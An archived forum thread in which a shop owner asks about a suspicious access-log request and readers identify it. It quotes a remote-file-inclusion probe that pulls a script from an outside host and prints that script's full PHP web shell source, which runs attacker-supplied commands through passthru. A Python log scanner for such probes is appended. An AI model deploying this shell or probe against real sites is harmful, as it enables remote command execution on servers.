awisdoms
Posted July 2, 2006

I have a question - I was going through my raw access log and I saw many variations of this throughout my log from -

```
210.99.208.60 - - [01/Jul/2006:09:26:58 -0400] "GET /index.php?cPath=http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado HTTP/1.0" 200 43425 "-" "LWP::Simple/5.53"
```

So I copied the http:// part and it gave me this below - so what are they trying to do in doing this, give me a virus?

```
<font color="#808080"><br></font><font color="#008000"><center><b><font face="verdana" size="2">CMD</font></b> <font face="verdana" size="2"> - System CoManD<br><br></font></center></font><font face="Verdana" size="1"><font color="#008000"><br>
<b>#</b> CMD PHP : <h1>PHP SHELL</h1><br>
<b>#</b></b></font><br>
<br>
<br>
<hr color="#000000" width=80% height=115px>
<br>
<div align="center">
<table border="1" cellpadding="0" cellspacing="0" width="633" height="17" bordercolorlight="#000080" bordercolordark="#000080">
<tr>
<td width="633" height="17">
<pre><font color="gray" font face="Tahoma" size="2">
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
</font></pre>
</tr>
</table>
</div>
<br>
<hr color="#000000" width=80% height=115px>
<p align="left">
<br>
<b> <font face="Verdana" size="1" color="#008000">PHP SHELL</font></b> <font face="Verdana" size="1" color="#008000"><br><b>
#<a href="mailto:[email protected]">Contact Us</font></a></b><br><font face="Verdana" size="1" color="#008000"><b># :D </b> </font>
```

mwstinson
Posted July 2, 2006

I don't know. At first I thought that it might be a webcrawler or something but when I loaded the URL specified my antivirus went insane. I don't know what it is but I wanted to put this post in to alert people not to try to load the URL: http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado and that you should scan your drives because that link tried to infect my computer with a trojan. Just a heads up!!

I thought this stuff was gonna be easy!! BACK IT UP BEFORE YOU JACK IT UP!!!!

Silverado05
Posted July 2, 2006

LoL, I could have told you that. All you have to do is read this line of code.

```
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
?>
```

Search the forum and contributions before posting. If that doesn't work, keep looking, then post. The forum is for seeking help and advice NOT for someone to do your work for you. Try to do something on your own, if you are going to run a shop then learn how it works.

Jan Zonjee
Posted July 2, 2006

Did you put the xpl directory in /images yourself or did the hackers do that? It seems full of scripts and stuff (hackers' stuff? And already for a long time, since April 2005 at least). The server is not set up to not show the listing of the directory when index.html or index.php is missing. This is not good either, I think.

awisdoms (Author)
Posted July 2, 2006

Yeah, I kinda figured it was a script by what it states - but I don't know how they can do such a thing??? They don't have access to my server or my site & no, I did not put any images in anything. Oh great on the code - I have zone alarm and nortons and nothing went off for me but I will check, thanks.
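
An added example, not part of the original thread: a small Python scan that flags access-log requests like the one quoted in the first post, where a query parameter's value is itself a remote URL. The function name, the sample list and every log line except the first (which is the one from the thread) are constructed for illustration, and the Apache combined log format is assumed.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself a URL is what a remote-include probe looks like.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_remote_include_probes(lines):
    """Return one record per query parameter whose decoded value starts with a URL scheme."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        params = parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, value in params:
            if REMOTE_RE.match(value):
                hits.append({
                    "host": m["host"], "time": m["time"], "agent": m["agent"],
                    # 200 only means a page was served, not that the include ran
                    "status": int(m["status"]),
                    "param": name, "remote": value.strip(),
                    "extra": {k: v for k, v in params if k != name},
                })
    return hits

SAMPLE_LOG = [
    # line quoted in the thread
    '210.99.208.60 - - [01/Jul/2006:09:26:58 -0400] "GET /index.php?cPath=http://www.ecidade.com.br/images/xpl/lila.jpg?&cmd=cat%20bugado HTTP/1.0" 200 43425 "-" "LWP::Simple/5.53"',
    # constructed: ordinary category request
    '192.0.2.10 - - [01/Jul/2006:09:30:00 -0400] "GET /index.php?cPath=21_32 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # constructed: percent-encoded variant against another parameter
    '198.51.100.7 - - [01/Jul/2006:09:31:12 -0400] "GET /index.php?page=ftp%3A%2F%2Fhost.example%2Fa.txt HTTP/1.0" 404 210 "-" "libwww-perl/5.805"',
]

if __name__ == "__main__":
    for hit in find_remote_include_probes(SAMPLE_LOG):
        print(hit["time"], hit["host"], hit["status"], hit["param"], hit["remote"], hit["extra"])
```

Parameters that legitimately carry URLs (a return or redirect address, for instance) will also match, so treat the output as a review list rather than a verdict.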
Archived
This topic is now archived and is closed to further replies.